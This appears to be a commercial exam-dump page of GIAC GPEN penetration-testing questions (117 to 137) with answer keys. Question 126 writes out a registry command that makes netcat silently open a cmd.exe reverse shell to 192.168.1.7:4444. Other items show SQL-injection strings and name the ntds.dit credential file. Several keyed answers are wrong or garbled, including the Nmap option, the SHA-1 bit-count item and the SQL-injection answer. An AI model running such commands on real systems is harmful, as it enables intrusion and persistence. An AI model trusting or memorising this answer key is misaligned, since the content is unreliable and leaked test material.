Instant Download GPEN Dumps Q&As Provide PDF&Test Engine
Fast Exam Updates GPEN dumps with PDF Test Engine Practice
GIAC GPEN (GIAC Certified Penetration Tester) exam is a popular certification for those who are interested in a career in cybersecurity. GIAC Certified Penetration Tester certification provides a comprehensive overview of the techniques and tools used by penetration testers to identify and exploit vulnerabilities in computer systems, networks, and applications. A GIAC GPEN certified professional is well equipped to simulate cyber attacks and to help organizations improve their security posture.
NEW QUESTION # 117
Which of the following are the countermeasures against WEP cracking?
Each correct answer represents a part of the solution. Choose all that apply.
- A. Using a 16 bit SSID.
- B. Changing keys often.
- C. Using the longest key supported by hardware.
- D. Using a non-obvious key.
Answer: B,C,D
Explanation:
Topic 4, Volume D
NEW QUESTION # 118
Joseph works as a Network Administrator for WebTech Inc. He has to set up a centralized area on the network so that each employee can share resources and documents with one another. Which of the following will he configure to accomplish the task?
- A. WEP
- B. Extranet
- C. Intranet
- D. VPN
Answer: C
Explanation:
Section: Volume B
NEW QUESTION # 119
You are pen testing a Windows system remotely via a raw netcat shell. You want to get a listing of all the local users in the administrators group, what command would you use?
- A. Net user administrators
- B. Net localuser administrators
- C. Net localgroup administrators
- D. Net account administrators
Answer: C
NEW QUESTION # 120
Fill in the blank with the appropriate act name.
The___ act gives consumers the right to ask emailers to stop spamming them.
Answer:
Explanation:
CAN-SPAM
NEW QUESTION # 121
Given the following Scapy information, how is default Layer 2 information derived?
- A. The default layer 2 information is contained in a local scapy.cfg configuration fileon the local system.
- B. If not explicitly defined, pseudo-random values are generated for the Layer 2 defaultinformation.
- C. If not explicitly defined, the Ether type field value Is created using the hex value ofthe destination port, in this case 80
- D. Scapy relies on the underlying operating system to construct Layer 2 information touse as default.
Answer: B
NEW QUESTION # 122
You suspect that system administrators In one part of the target organization are turning off their systems during the times when penetration tests are scheduled, what feature could you add to the ' Rules of engagement' that could help your team test that part of the target organization?
- A. Test systems after normal business hours
- B. Tell response personnel the exact lime the test will occur
- C. Un announced test
- D. Limit tests to business hours
Answer: A
Explanation:
Section: Volume A
NEW QUESTION # 123
Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks (WLANs). It has two components, authentication and encryption. It provides security equivalent to wired networks for wireless networks. WEP encrypts data on a wireless network by using a fixed secret key. Which of the following statements are true about WEP?
Each correct answer represents a complete solution. Choose all that apply.
- A. Automated tools such as AirSnort are available for discovering WEP keys.
- B. It provides better security than the Wi-Fi Protected Access protocol.
- C. WEP uses the RC4 encryption algorithm.
- D. The Initialization Vector (IV) field of WEP is only 24 bits long.
Answer: A,C,D
NEW QUESTION # 124
You are using the Nmap Scripting Engine and want detailed output of the script as it runs. Which option do you include in the command string?
- A. Nmap -v --script=ssh-hostkey.nse 155.65.3.221 -p 22
- B. Nmap --script-output -script-SSH-hostkey.nse 155.65.3.221 -p 22
- C. Nmap --script-trace --script-ssh-hostkey.nse 155.65.3.221 -p 22
- D. Nmap -script-verbose --scrlpr-ssh-hostkey.nse 155.65.3.221 -p 22
Answer: D
Explanation:
Section: Volume A
NEW QUESTION # 125
Which of the following is the correct sequence of packets to perform the 3-way handshake method?
- A. SYN, ACK, SYN/ACK
- B. SYN, SYN/ACK, ACK
- C. SYN, ACK, ACK
- D. SYN, SYN, ACK
Answer: B
Explanation:
Section: Volume D
NEW QUESTION # 126
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t
REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
- A. You want to put Netcat in the stealth mode.
- B. You want to set the Netcat to execute command any time.
- C. You want to add the Netcat command to the Windows registry.
- D. You want to perform banner grabbing.
Answer: A,B,C
NEW QUESTION # 127
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.we-are- secure.com. He has to ping 500 computers to find out whether these computers are connected to the server or not. Which of the following will he use to ping these computers?
- A. Ping sweeping
- B. NETSTAT
- C. PING
- D. TRACEROUTE
Answer: A
NEW QUESTION # 128
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully performed the following steps of the preattack phase to check the security of the We-are-secure network:
Gathering information
Determining the network range
Identifying active systems
Now, he wants to find the open ports and applications running on the network. Which of the following tools will he use to accomplish his task?
- A. RIPE
- B. APNIC
- C. ARIN
- D. SuperScan
Answer: D
Explanation:
Section: Volume D
NEW QUESTION # 129
As pan or a penetration lest, your team is tasked with discovering vulnerabilities that could be exploited from an inside threat vector. Which of the following activities fall within that scope?
a. SQL injection attacks against the hr intranet website.
b. A competitor's employee's scanning the company's website.
c. Wireless "war driving" the company manufacturing site.
d. Running a Nessus scan from the sales department network.
- A. B and D
- B. A, B, and D
- C. B, C, and D
- D. A and D
Answer: A
NEW QUESTION # 130
Which of the following tools can be used to automate the MITM attack?
- A. Airjack
- B. IKECrack
- C. Hotspotter
- D. Kismet
Answer: A
Explanation:
Section: Volume D
NEW QUESTION # 131
How many bits encryption does SHA-1 use?
- A. 0
- B. 1
- C. 2
- D. 3
Answer: A
NEW QUESTION # 132
While performing a code audit, you discover a SQL injection vulnerability assuming the following vulnerable query, what user input could be injected to make the query true and return data?
select * from widgets where name = '[user-input]';
- A. `or l=l...
- B. `or l=1'
- C. 'or 1=1--
- D. 'or 1=1
Answer: B
NEW QUESTION # 133
Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?
- A. Absinthe
- B. Fragroute
- C. Stick
- D. ADMutate
Answer: A
NEW QUESTION # 134
By default Active Directory Controllers store password representations in which file?
- A. %systemroot /ntds\ntds.dit
- B. %systemroot .system 32/ntds.dit
- C. %systemroot /ntds\sam.dat
- D. %systemroot /ntds\sam.dit
Answer: A
Explanation:
Section: Volume A
NEW QUESTION # 135
You want to retrieve the default security report of nessus. Which of the following google search queries will you use?
- A. filetype:pdf "Assessment Report" nessus
- B. site:pdf nessus "Assessment report"
- C. filetype:pdf nessus
- D. link:pdf nessus "Assessment report"
Answer: A
NEW QUESTION # 136
Which of the following tools can be used as a Linux vulnerability scanner that is capable of identifying operating systems and network services?
Each correct answer represents a complete solution. Choose all that apply.
- A. Cheops-ng
- B. Fport
- C. Cheops
- D. Elsave
Answer: A,C
Explanation:
Section: Volume B
NEW QUESTION # 137
......
Exam Valid Dumps with Instant Download Free Updates: https://pass4sure.actualtorrent.com/GPEN-exam-guide-torrent.html